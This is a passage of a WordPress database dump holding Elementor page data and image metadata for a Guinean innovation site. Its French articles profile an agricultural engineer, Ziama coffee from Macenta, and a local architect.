"elements\":[{\"id\":\"yrwmcrb\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"jyagbuw\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Samba Sory Camaraest un ing\\u00e9nieur agricole avec son entreprise agropastoral Business Kinyapa, il pr\\u00f4ne et pratique l\'agriculture Bio et conventionnelle.<\\/p><p>Regardez cette petite vid\\u00e9o...<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ulyp6wx\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"eqfdpa5\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"tudcifl\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?time_continue=16&v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false}]'),(1966,635,'_elementor_edit_mode','builder'),(1967,635,'_elementor_data','[{\"id\":\"muazdsg\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"yrwmcrb\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"jyagbuw\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Samba Sory Camaraest un ing\\u00e9nieur agricole avec son entreprise agropastoral Business Kinyapa, il pr\\u00f4ne et pratique l\'agriculture Bio et conventionnelle.\\r\\n\\r\\nRegardez cette petite vid\\u00e9o...\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ulyp6wx\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"eqfdpa5\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"tudcifl\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?time_continue=16&v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false}]'),(1968,632,'_elementor_version','0.4'),(1970,636,'_wp_attached_file','2017/10/samba.jpg'),(1971,636,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:540;s:6:\"height\";i:960;s:4:\"file\";s:17:\"2017/10/samba.jpg\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"samba-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"samba-169x300.jpg\";s:5:\"width\";i:169;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1972,632,'_thumbnail_id','822'),(1975,638,'_edit_last','1'),(1976,638,'_edit_lock','1509987905:1'),(1977,640,'_wp_attached_file','2017/10/cafe_ziama_macenta-679x380.jpg'),(1978,640,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:679;s:6:\"height\";i:380;s:4:\"file\";s:38:\"2017/10/cafe_ziama_macenta-679x380.jpg\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:38:\"cafe_ziama_macenta-679x380-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:38:\"cafe_ziama_macenta-679x380-300x168.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:168;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1979,641,'_wp_attached_file','2017/10/ziama.jpg'),(1980,641,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:728;s:6:\"height\";i:300;s:4:\"file\";s:17:\"2017/10/ziama.jpg\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"ziama-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"ziama-300x124.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:124;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1982,638,'post_views_count','712'),(1983,638,'_elementor_data','[{\"id\":\"wbetpkd\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"rmeknfg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"itwmxwk\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Le\\u00a0caf\\u00e9\\u00a0\\u2018\\u2019Ziama\\u2019\\u2019 qui porte le nom de son origine g\\u00e9ographique, est une nouvelle vari\\u00e9t\\u00e9 de qualit\\u00e9 sup\\u00e9rieure qui fait actuellement \\u00e9cho \\u00e0 travers le monde, a fait savoir le technologue du Laboratoire en caf\\u00e9iculture au Centre R\\u00e9gional de Recherche Agronomique de la Guin\\u00e9e Foresti\\u00e8re (CRRA-GF), bas\\u00e9 \\u00e0 S\\u00e9r\\u00e9dou, M. Gono-yo Traor\\u00e9, au cours d\\u2019un entretien.\\n<img class=\\\"alignnone size-medium wp-image-641\\\" src=\\\"https:\\/\\/guineeinnove.nimbasolution.com\\/wp-content\\/uploads\\/2017\\/10\\/ziama-300x124.jpg\\\" alt=\\\"\\\" width=\\\"300\\\" height=\\\"124\\\" \\/>\\nM. Traor\\u00e9 a en outre indiqu\\u00e9, que ce\\u00a0caf\\u00e9\\u00a0a \\u00e9t\\u00e9 retenu meilleur\\u00a0<a href=\\\"https:\\/\\/www.maxicoffee.com\\/cafe-c-6.html\\\">caf\\u00e9<\\/a>\\u00a0de qualit\\u00e9 sup\\u00e9rieure en Guin\\u00e9e apr\\u00e8s avoir organis\\u00e9 un test de tous les\\u00a0<a href=\\\"https:\\/\\/www.maxicoffee.com\\/cafe-c-6.html\\\">caf\\u00e9s<\\/a>\\u00a0produits actuellement dans les quatre r\\u00e9gions naturelles de la Guin\\u00e9e. Le \\u2018\\u2019comportement agronomique\\u2019\\u2019 du<strong>\\u00a0<a href=\\\"https:\\/\\/www.maxicoffee.com\\/cafe-c-6.html\\\">caf\\u00e9<\\/a>\\u00a0Ziama li\\u00e9 \\u00e0 son go\\u00fbt aromatique, acidul\\u00e9 et peu amer, son rendement \\u00e9lev\\u00e9 \\u00e0 l\\u2019hectare, sa r\\u00e9sistance par rapport aux diff\\u00e9rentes maladies<\\/strong>, sont entre autres les crit\\u00e8res qui ont permis au Laboratoire de le classer parmi les meilleures qualit\\u00e9s en Guin\\u00e9e, a-t-il ajout\\u00e9.\\n\\nSelon toujours le technologue du Laboratoire, une \\u00e9tude comparative approfondie, r\\u00e9alis\\u00e9e par le Laboratoire au cours de l\\u2019ann\\u00e9e 2000, a \\u00e9galement permis de savoir que le massif forestier de Ziama a une grande influence sur la qualit\\u00e9 du\\u00a0<a href=\\\"https:\\/\\/www.maxicoffee.com\\/cafe-c-6.html\\\">caf\\u00e9<\\/a>\\u2026\\n\\nL\\u2019influence \\u00e9cologique du milieu, li\\u00e9e \\u00e0 la pluviom\\u00e9trie (9 mois et plus de pluie sur 12 mois de l\\u2019ann\\u00e9e) et \\u00e0 la v\\u00e9g\\u00e9tation verdoyante, fait que n\\u2019importe quelle qualit\\u00e9 de\\u00a0<a href=\\\"https:\\/\\/www.maxicoffee.com\\/cafe-c-6.html\\\">caf\\u00e9<\\/a>\\u00a0plant\\u00e9 dans le milieu peut<i>\\u00a0\\u2018\\u2019se comporter de la m\\u00eame mani\\u00e8re\\u2019\\u2019<\\/i>, a-t-il fait remarquer.\\nIl a par ailleurs, plaid\\u00e9 pour un appui technique et financier \\u00e0 l\\u2019Association des Producteurs de\\u00a0<a href=\\\"https:\\/\\/www.maxicoffee.com\\/cafe-c-6.html\\\">Caf\\u00e9<\\/a>\\u00a0(APC), afin que tout le processus de calibrage et de traitement de la nouvelle vari\\u00e9t\\u00e9 de\\u00a0<a href=\\\"https:\\/\\/www.maxicoffee.com\\/cafe-c-6.html\\\">caf\\u00e9<\\/a>\\u00a0Ziama, soit fait sur place \\u00e0 S\\u00e9r\\u00e9dou, en vue d\\u2019\\u00e9viter les cas de fraude, a ajout\\u00e9 M. Traor\\u00e9.\\n\\n<b>Le\\u00a0<a href=\\\"https:\\/\\/www.maxicoffee.com\\/cafe-c-6.html\\\">caf\\u00e9<\\/a>\\u00a0Ziama Macenta de Guin\\u00e9e<\\/b>, est un\\u00a0<a href=\\\"https:\\/\\/www.maxicoffee.com\\/cafe-c-6.html\\\">caf\\u00e9<\\/a>\\u00a0robusta aux qualit\\u00e9s exceptionnelles, proches de celle de l\\u2019Arabica. Cultiv\\u00e9 en Guin\\u00e9e foresti\\u00e8re sur le Mont Ziama, aux confins du Liberia et de la C\\u00f4te d\\u2019Ivoire, le\\u00a0<a href=\\\"https:\\/\\/www.maxicoffee.com\\/cafe-c-6.html\\\">caf\\u00e9<\\/a>Ziama Macenta est un robusta particulier : sa saveur est acidul\\u00e9e et peu amer. Il se distingue par ses ar\\u00f4mes persistants, \\u00e0 la fois forts et fins.\\n<a href=\\\"https:\\/\\/www.maxicoffee.com\\/cafe-c-6.html\\\"><img class=\\\"lazyloading\\\" title=\\\"\\\" src=\\\"http:\\/\\/www.guineeconakry.info\\/typo3temp\\/pics\\/93d50eb614.gif\\\" alt=\\\"\\\" width=\\\"300\\\" height=\\\"225\\\" border=\\\"0\\\" \\/><\\/a>\\nLa qualit\\u00e9 de ce\\u00a0<a href=\\\"https:\\/\\/www.maxicoffee.com\\/cafe-c-6.html\\\">caf\\u00e9<\\/a>\\u00a0d\\u00e9pend fortement des op\\u00e9rations de r\\u00e9colte et de post-r\\u00e9colte. Les cerises doivent \\u00eatre r\\u00e9colt\\u00e9es de mani\\u00e8re s\\u00e9lective \\u00e0 maturit\\u00e9 en trois passages. Elles sont tri\\u00e9es par trempage puis s\\u00e9ch\\u00e9es au soleil avec des remuages r\\u00e9guliers. Le s\\u00e9chage se fait essentiellement au soleil sur claies pendant trois semaines. Les cerises s\\u00e8ches sont ensuite d\\u00e9cortiqu\\u00e9es m\\u00e9caniquement en \\u00e9vitant les brisures.\\n\\nSelon de nombreux t\\u00e9moignages des anciens,\\u00a0<i>\\u00ab au temps des colons, les collecteurs passaient longtemps \\u00e0 Macenta pour augmenter la qualit\\u00e9 de leur m\\u00e9lange \\u00bb<\\/i>. Le\\u00a0<a href=\\\"https:\\/\\/www.maxicoffee.com\\/cafe-c-6.html\\\">caf\\u00e9<\\/a>\\u00a0de Macenta a ainsi acquis une notori\\u00e9t\\u00e9 aupr\\u00e8s des importateurs et des torr\\u00e9facteurs durant cette p\\u00e9riode. Il est encore utilis\\u00e9 aujourd\\u2019hui pour relever la base des\\u00a0<a href=\\\"https:\\/\\/www.maxicoffee.com\\/cafe-c-6.html\\\">caf\\u00e9s<\\/a>\\u00a0de plus mauvaise qualit\\u00e9.\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"yod0201\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"yb2z3co\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1z1rg2t\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs&t=29s\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false}]'),(1984,642,'_elementor_edit_mode','builder'),(1985,642,'_elementor_data','[{\"id\":\"wbetpkd\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"rmeknfg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"itwmxwk\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Le\\u00a0caf\\u00e9\\u00a0\\u2018\\u2019Ziama\\u2019\\u2019 qui porte le nom de son origine g\\u00e9ographique, est une nouvelle vari\\u00e9t\\u00e9 de qualit\\u00e9 sup\\u00e9rieure qui fait actuellement \\u00e9cho \\u00e0 travers le monde, a fait savoir le technologue du Laboratoire en caf\\u00e9iculture au Centre R\\u00e9gional de Recherche Agronomique de la Guin\\u00e9e Foresti\\u00e8re (CRRA-GF), bas\\u00e9 \\u00e0 S\\u00e9r\\u00e9dou, M. Gono-yo Traor\\u00e9, au cours d\\u2019un entretien.\\n<img class=\\\"alignnone size-medium wp-image-641\\\" src=\\\"https:\\/\\/guineeinnove.nimbasolution.com\\/wp-content\\/uploads\\/2017\\/10\\/ziama-300x124.jpg\\\" alt=\\\"\\\" width=\\\"300\\\" height=\\\"124\\\" \\/>\\nM. Traor\\u00e9 a en outre indiqu\\u00e9, que ce\\u00a0caf\\u00e9\\u00a0a \\u00e9t\\u00e9 retenu meilleur\\u00a0<a href=\\\"https:\\/\\/www.maxicoffee.com\\/cafe-c-6.html\\\">caf\\u00e9<\\/a>\\u00a0de qualit\\u00e9 sup\\u00e9rieure en Guin\\u00e9e apr\\u00e8s avoir organis\\u00e9 un test de tous les\\u00a0<a href=\\\"https:\\/\\/www.maxicoffee.com\\/cafe-c-6.html\\\">caf\\u00e9s<\\/a>\\u00a0produits actuellement dans les quatre r\\u00e9gions naturelles de la Guin\\u00e9e. Le \\u2018\\u2019comportement agronomique\\u2019\\u2019 du<strong>\\u00a0<a href=\\\"https:\\/\\/www.maxicoffee.com\\/cafe-c-6.html\\\">caf\\u00e9<\\/a>\\u00a0Ziama li\\u00e9 \\u00e0 son go\\u00fbt aromatique, acidul\\u00e9 et peu amer, son rendement \\u00e9lev\\u00e9 \\u00e0 l\\u2019hectare, sa r\\u00e9sistance par rapport aux diff\\u00e9rentes maladies<\\/strong>, sont entre autres les crit\\u00e8res qui ont permis au Laboratoire de le classer parmi les meilleures qualit\\u00e9s en Guin\\u00e9e, a-t-il ajout\\u00e9.\\n\\nSelon toujours le technologue du Laboratoire, une \\u00e9tude comparative approfondie, r\\u00e9alis\\u00e9e par le Laboratoire au cours de l\\u2019ann\\u00e9e 2000, a \\u00e9galement permis de savoir que le massif forestier de Ziama a une grande influence sur la qualit\\u00e9 du\\u00a0<a href=\\\"https:\\/\\/www.maxicoffee.com\\/cafe-c-6.html\\\">caf\\u00e9<\\/a>\\u2026\\n\\nL\\u2019influence \\u00e9cologique du milieu, li\\u00e9e \\u00e0 la pluviom\\u00e9trie (9 mois et plus de pluie sur 12 mois de l\\u2019ann\\u00e9e) et \\u00e0 la v\\u00e9g\\u00e9tation verdoyante, fait que n\\u2019importe quelle qualit\\u00e9 de\\u00a0<a href=\\\"https:\\/\\/www.maxicoffee.com\\/cafe-c-6.html\\\">caf\\u00e9<\\/a>\\u00a0plant\\u00e9 dans le milieu peut<i>\\u00a0\\u2018\\u2019se comporter de la m\\u00eame mani\\u00e8re\\u2019\\u2019<\\/i>, a-t-il fait remarquer.\\nIl a par ailleurs, plaid\\u00e9 pour un appui technique et financier \\u00e0 l\\u2019Association des Producteurs de\\u00a0<a href=\\\"https:\\/\\/www.maxicoffee.com\\/cafe-c-6.html\\\">Caf\\u00e9<\\/a>\\u00a0(APC), afin que tout le processus de calibrage et de traitement de la nouvelle vari\\u00e9t\\u00e9 de\\u00a0<a href=\\\"https:\\/\\/www.maxicoffee.com\\/cafe-c-6.html\\\">caf\\u00e9<\\/a>\\u00a0Ziama, soit fait sur place \\u00e0 S\\u00e9r\\u00e9dou, en vue d\\u2019\\u00e9viter les cas de fraude, a ajout\\u00e9 M. Traor\\u00e9.\\n\\n<b>Le\\u00a0<a href=\\\"https:\\/\\/www.maxicoffee.com\\/cafe-c-6.html\\\">caf\\u00e9<\\/a>\\u00a0Ziama Macenta de Guin\\u00e9e<\\/b>, est un\\u00a0<a href=\\\"https:\\/\\/www.maxicoffee.com\\/cafe-c-6.html\\\">caf\\u00e9<\\/a>\\u00a0robusta aux qualit\\u00e9s exceptionnelles, proches de celle de l\\u2019Arabica. Cultiv\\u00e9 en Guin\\u00e9e foresti\\u00e8re sur le Mont Ziama, aux confins du Liberia et de la C\\u00f4te d\\u2019Ivoire, le\\u00a0<a href=\\\"https:\\/\\/www.maxicoffee.com\\/cafe-c-6.html\\\">caf\\u00e9<\\/a>Ziama Macenta est un robusta particulier : sa saveur est acidul\\u00e9e et peu amer. Il se distingue par ses ar\\u00f4mes persistants, \\u00e0 la fois forts et fins.\\n<a href=\\\"https:\\/\\/www.maxicoffee.com\\/cafe-c-6.html\\\"><img class=\\\"lazyloading\\\" title=\\\"\\\" src=\\\"http:\\/\\/www.guineeconakry.info\\/typo3temp\\/pics\\/93d50eb614.gif\\\" alt=\\\"\\\" width=\\\"300\\\" height=\\\"225\\\" border=\\\"0\\\" \\/><\\/a>\\nLa qualit\\u00e9 de ce\\u00a0<a href=\\\"https:\\/\\/www.maxicoffee.com\\/cafe-c-6.html\\\">caf\\u00e9<\\/a>\\u00a0d\\u00e9pend fortement des op\\u00e9rations de r\\u00e9colte et de post-r\\u00e9colte. Les cerises doivent \\u00eatre r\\u00e9colt\\u00e9es de mani\\u00e8re s\\u00e9lective \\u00e0 maturit\\u00e9 en trois passages. Elles sont tri\\u00e9es par trempage puis s\\u00e9ch\\u00e9es au soleil avec des remuages r\\u00e9guliers. Le s\\u00e9chage se fait essentiellement au soleil sur claies pendant trois semaines. Les cerises s\\u00e8ches sont ensuite d\\u00e9cortiqu\\u00e9es m\\u00e9caniquement en \\u00e9vitant les brisures.\\n\\nSelon de nombreux t\\u00e9moignages des anciens,\\u00a0<i>\\u00ab au temps des colons, les collecteurs passaient longtemps \\u00e0 Macenta pour augmenter la qualit\\u00e9 de leur m\\u00e9lange \\u00bb<\\/i>. Le\\u00a0<a href=\\\"https:\\/\\/www.maxicoffee.com\\/cafe-c-6.html\\\">caf\\u00e9<\\/a>\\u00a0de Macenta a ainsi acquis une notori\\u00e9t\\u00e9 aupr\\u00e8s des importateurs et des torr\\u00e9facteurs durant cette p\\u00e9riode. Il est encore utilis\\u00e9 aujourd\\u2019hui pour relever la base des\\u00a0<a href=\\\"https:\\/\\/www.maxicoffee.com\\/cafe-c-6.html\\\">caf\\u00e9s<\\/a>\\u00a0de plus mauvaise qualit\\u00e9.\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"yod0201\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"yb2z3co\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1z1rg2t\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs&t=29s\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false}]'),(1986,638,'_elementor_version','0.4'),(1987,638,'_wp_page_template','default'),(1990,638,'_elementor_css','a:3:{s:4:\"time\";i:1509027473;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(1991,638,'_thumbnail_id','640'),(2004,649,'_wp_attached_file','2017/10/2.jpg'),(2005,649,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:540;s:4:\"file\";s:13:\"2017/10/2.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:13:\"2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:13:\"2-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:13:\"2-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2006,650,'_wp_attached_file','2017/10/3.jpg'),(2007,650,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:366;s:6:\"height\";i:206;s:4:\"file\";s:13:\"2017/10/3.jpg\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:13:\"3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:13:\"3-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2008,651,'_wp_attached_file','2017/10/4.jpg'),(2009,651,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:540;s:4:\"file\";s:13:\"2017/10/4.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:13:\"4-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:13:\"4-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:13:\"4-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2010,652,'_wp_attached_file','2017/10/6.jpg'),(2011,652,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:540;s:4:\"file\";s:13:\"2017/10/6.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:13:\"6-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:13:\"6-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:13:\"6-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2012,653,'_wp_attached_file','2017/10/6-1.jpg'),(2013,653,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:540;s:4:\"file\";s:15:\"2017/10/6-1.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"6-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"6-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"6-1-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2014,416,'_elementor_data','[{\"id\":\"euubokk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"bkemspx\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"khcjseg\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"alignnone size-medium wp-image-417\\\" src=\\\"https:\\/\\/guineeinnove.nimbasolution.com\\/wp-content\\/uploads\\/2017\\/10\\/architecte-300x169.jpg\\\" alt=\\\"\\\" width=\\\"300\\\" height=\\\"169\\\" \\/><\\/p><p>Moustapha Haidara est un jeune architecte Guin\\u00e9en, consid\\u00e9r\\u00e9 par ses pairs comme le meilleur de tous. Il a cr\\u00e9e un concept de maison particuli\\u00e8rement innovant ayant des caract\\u00e9ristiques particuli\\u00e8re:<\\/p><p>\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7jptpz6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"rkl0mp3\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"usnd9qg\",\"elType\":\"widget\",\"settings\":{\"wp_gallery\":[{\"id\":417,\"url\":\"https:\\/\\/guineeinnove.nimbasolution.com\\/wp-content\\/uploads\\/2017\\/10\\/architecte.jpg\"},{\"id\":651,\"url\":\"https:\\/\\/guineeinnove.nimbasolution.com\\/wp-content\\/uploads\\/2017\\/10\\/4.jpg\"},{\"id\":650,\"url\":\"https:\\/\\/guineeinnove.nimbasolution.com\\/wp-content\\/uploads\\/2017\\/10\\/3.jpg\"},{\"id\":649,\"url\":\"https:\\/\\/guineeinnove.nimbasolution.com\\/wp-content\\/uploads\\/2017\\/10\\/2.jpg\"},{\"id\":652,\"url\":\"https:\\/\\/guineeinnove.nimbasolution.com\\/wp-content\\/uploads\\/2017\\/10\\/6.jpg\"},{\"id\":653,\"url\":\"https:\\/\\/guineeinnove.nimbasolution.com\\/wp-content\\/uploads\\/2017\\/10\\/6-1.jpg\"}],\"thumbnail_size\":\"medium_large\",\"gallery_columns\":\"3\",\"open_lightbox\":\"yes\"},\"elements\":[],\"widgetType\":\"image-gallery\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4ivvdi0\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1uy6ay8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"k5k2nxn\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>-<strong>Toit en 